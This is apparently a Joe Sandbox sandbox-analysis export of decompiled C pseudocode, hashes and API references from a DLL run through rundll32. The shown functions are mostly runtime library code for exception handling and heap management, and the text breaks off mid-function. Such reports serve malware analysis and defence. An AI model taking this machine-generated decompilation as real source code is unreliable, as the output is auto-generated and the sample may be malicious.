Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
Instruction ID: d6a1b6dbef85d15a2449a7ad8e6a947c604b614d6ee9e06ed70c267ba889a7c5
Opcode Fuzzy Hash: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
Instruction Fuzzy Hash: A451A4B290064A9FDB00CFA8C985AEEBBFAEF0A300F15455AE955F7381D730D951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E223F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6E223F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6e2c506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6E223F20(_t74, __edx);
				E6E225267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6E225920(_t74, 0xfffffffe, _t93, 0x6e2c506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6E2258D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6E223F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6e26e698;
											if(__eflags != 0) {
												_t70 = E6E267400(__eflags, 0x6e26e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6e26e698; // 0x6e223b1a
													 *0x6e26a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6E225904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6E225920(_t63, _t90, _t93, 0x6e2c506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6E223F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6E2258E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6E242281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6e2c7b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6E25BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6E249256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

0x6e223f60
0x6e223f66
0x6e223f67
0x6e223f6b
0x6e223f6c
0x6e223f73
0x6e223f76
0x6e223f7c
0x6e223f7d
0x6e223f7e
0x6e223f85
0x6e223f88
0x6e223f8b
0x6e223f93
0x6e223f98
0x6e223f9b
0x6e223f9e
0x6e223fa5
0x6e224006
0x6e224009
0x6e224011
0x6e224018
0x00000000
0x6e224018
0x00000000
0x6e223fa7
0x6e223fa7
0x6e223fad
0x6e223fb3
0x6e223fb9
0x6e224029
0x6e224032
0x6e223fbb
0x6e223fc0
0x6e223fc0
0x6e223fc3
0x6e223fc6
0x6e223fc9
0x6e223fcc
0x6e223fcf
0x6e223fd2
0x6e223fd7
0x6e223fed
0x00000000
0x6e223fd9
0x6e223fd9
0x6e223fdb
0x6e223fe0
0x6e223fe2
0x6e223fe5
0x6e223fe7
0x6e223ffd
0x6e22401d
0x6e22401d
0x6e22401e
0x6e224021
0x00000000
0x6e223fe9
0x6e223fe9
0x6e224033
0x6e224036
0x6e22403c
0x6e22403e
0x6e224045
0x6e22404c
0x6e224051
0x6e224054
0x6e224056
0x6e224058
0x6e224065
0x6e22406b
0x6e22406d
0x6e224070
0x6e224070
0x6e224073
0x6e224073
0x6e224045
0x6e224079
0x6e22407b
0x6e224080
0x6e224083
0x6e224086
0x6e22408e
0x6e224092
0x6e224097
0x6e224097
0x6e22409a
0x6e22409b
0x6e22409e
0x6e2240a1
0x6e2240ac
0x6e2240ae
0x6e2240b1
0x6e2240b6
0x6e2240ba
0x6e2423d7
0x6e24f26f
0x6e24f272
0x6e24f273
0x6e24f276
0x6e24f279
0x6e24f2ab
0x6e24f2b0
0x6e24f2b6
0x6e24f2b6
0x6e24f27b
0x6e24f27b
0x6e24f27d
0x6e24f27f
0x6e24f27f
0x6e24f296
0x6e24f29f
0x6e24f2a5
0x6e24f2a7
0x00000000
0x00000000
0x6e24f287
0x6e24f289
0x00000000
0x6e24f28b
0x6e24f28c
0x6e24f291
0x6e24f292
0x6e24f294
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24f294
0x00000000
0x6e24f289
0x6e24f2a9
0x6e24f2b8
0x6e24f2ba
0x6e223feb
0x00000000
0x6e223feb
0x6e223fe9
0x6e223fe7
0x00000000
0x6e223ff0
0x6e223ff0
0x6e223ff2
0x6e223ff9
0x00000000
0x6e223ffb
0x00000000
0x6e223ff9
0x6e223fb9
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E223F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6E223F93
_ValidateLocalCookies.LIBCMT ref: 6E224021
__IsNonwritableInCurrentImage.LIBCMT ref: 6E22404C
_ValidateLocalCookies.LIBCMT ref: 6E2240A1

Strings

csm, xrefs: 6E224036

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
Instruction ID: d5a374a0051502dc650a2e16d71fb59f373354c9ded5dce8767f4bfa821dc166
Opcode Fuzzy Hash: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
Instruction Fuzzy Hash: 3641B434A0020E9FCF04DFE9D844A9E7BB6BF45329F108565E8149B395D7B1DA42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E25D29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E25D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E25CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6E25CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6E25CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6E25CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6E25CF81(_t5, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6E25CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6E25CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6E25CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6E25CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6E25CF81(_t13, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E24CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6e25d2a1
0x6e25d2a6
0x6e25d2af
0x6e25d2b4
0x6e25d2ba
0x6e25d2bf
0x6e25d2c5
0x6e25d2ca
0x6e25d2d0
0x6e25d2d5
0x6e25d2de
0x6e25d2e9
0x6e25d2f4
0x6e25d2ff
0x6e25d304
0x6e25d30d
0x6e25d312
0x6e25d31b
0x6e25d323
0x6e25d32c
0x6e25d331
0x6e25d33a
0x6e25d33f
0x6e25d348
0x6e25d353
0x6e25d35e
0x6e25d369
0x00000000
0x6e25d379
0x6e25d37e

APIs

Part of subcall function 6E25CF81: _free.LIBCMT ref: 6E25CFAA

_free.LIBCMT ref: 6E25D2E9

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E25D2F4
_free.LIBCMT ref: 6E25D2FF
_free.LIBCMT ref: 6E25D353
_free.LIBCMT ref: 6E25D35E
_free.LIBCMT ref: 6E25D369
_free.LIBCMT ref: 6E25D374

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: 8fa4785d91d2f5e5975e706f67165941b4479354c1bb5b7543d275e210967cf9
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: 4D118175944B0CFBE520A7F0CD07FCBB7AE9F00B14F508D16E29AAE251EB39B5144650

Uniqueness

Uniqueness Score: -1.00%

Function 6E20EF91, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20EF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t946 - 0x14, 0);
				_t903 =  *0x6e2c6de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6E1E161C(0x6e2c6d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6E2066BA(_t946 - 0x14);
					return E6E220075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6E210D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t946 - 0x20);
							E6E223D74(_t946 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t881, _t903, 0x14);
							E6E206653(_t946 - 0x14, 0);
							_t904 =  *0x6e2c6db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6E1E161C(0x6e2c6d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6E2066BA(_t946 - 0x14);
								return E6E220075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6E210DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t946 - 0x20);
										E6E223D74(_t946 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t668, _t882, _t904, 0x14);
										E6E206653(_t946 - 0x14, 0);
										_t905 =  *0x6e2c6dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6E1E161C(0x6e2c6b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6E2066BA(_t946 - 0x14);
											return E6E220075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6E210E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t946 - 0x20);
													E6E223D74(_t946 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t668, _t883, _t905, 0x14);
													E6E206653(_t946 - 0x14, 0);
													_t906 =  *0x6e2c6de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6E1E161C(0x6e2c6d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6E2066BA(_t946 - 0x14);
														return E6E220075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6E210EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t946 - 0x20);
																E6E223D74(_t946 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t668, _t884, _t906, 0x14);
																E6E206653(_t946 - 0x14, 0);
																_t907 =  *0x6e2c6db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6E1E161C(0x6e2c6d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6E2066BA(_t946 - 0x14);
																	return E6E220075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6E210F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t946 - 0x20);
																			E6E223D74(_t946 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t668, _t885, _t907, 0x14);
																			E6E206653(_t946 - 0x14, 0);
																			_t908 =  *0x6e2c6dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6E1E161C(0x6e2c6d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6E2066BA(_t946 - 0x14);
																				return E6E220075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6E210F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t946 - 0x20);
																						E6E223D74(_t946 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t668, _t886, _t908, 0x14);
																						E6E206653(_t946 - 0x14, 0);
																						_t909 =  *0x6e2c6dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6E1E161C(0x6e2c6d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6E2066BA(_t946 - 0x14);
																							return E6E220075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6E210FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t946 - 0x20);
																									E6E223D74(_t946 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t668, _t887, _t909, 0x14);
																									E6E206653(_t946 - 0x14, 0);
																									_t910 =  *0x6e2c6df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6E1E161C(0x6e2c6d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6E2066BA(_t946 - 0x14);
																										return E6E220075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6E211057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t946 - 0x20);
																												E6E223D74(_t946 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t668, _t888, _t910, 0x14);
																												E6E206653(_t946 - 0x14, 0);
																												_t911 =  *0x6e2c6dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6E1E161C(0x6e2c6d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6E2066BA(_t946 - 0x14);
																													return E6E220075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6E2110BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t946 - 0x20);
																															E6E223D74(_t946 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t668, _t889, _t911, 0x14);
																															E6E206653(_t946 - 0x14, 0);
																															_t912 =  *0x6e2c6df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6E1E161C(0x6e2c6da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6E2066BA(_t946 - 0x14);
																																return E6E220075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6E211127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t946 - 0x20);
																																		E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t668, _t890, _t912, 0x14);
																																		E6E206653(_t946 - 0x14, 0);
																																		_t913 =  *0x6e2c6df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6E1E161C(0x6e2c6da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6E2066BA(_t946 - 0x14);
																																			return E6E220075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6E2111AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t946 - 0x20);
																																					E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t668, _t891, _t913, 0x14);
																																					E6E206653(_t946 - 0x14, 0);
																																					_t914 =  *0x6e2c6dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6E1E161C(0x6e2c6d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6E2066BA(_t946 - 0x14);
																																						return E6E220075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6E211230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t946 - 0x20);
																																								E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t668, _t892, _t914, 0x14);
																																								E6E206653(_t946 - 0x14, 0);
																																								_t915 =  *0x6e2c6dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6E1E161C(0x6e2c6d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6E2066BA(_t946 - 0x14);
																																									return E6E220075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6E2112B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t946 - 0x20);
																																											E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t668, _t893, _t915, 0x14);
																																											E6E206653(_t946 - 0x14, 0);
																																											_t916 =  *0x6e2c6dd8; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6E1E161C(0x6e2c6d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6E2066BA(_t946 - 0x14);
																																												return E6E220075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6E211339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t946 - 0x20);
																																														E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t668, _t894, _t916, 0x14);
																																														E6E206653(_t946 - 0x14, 0);
																																														_t917 =  *0x6e2c6db0; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6E1E161C(0x6e2c6d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6E2066BA(_t946 - 0x14);
																																															return E6E220075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6E2113A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t946 - 0x20);
																																																	E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t668, _t895, _t917, 0x14);
																																																	E6E206653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6e2c6ddc; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
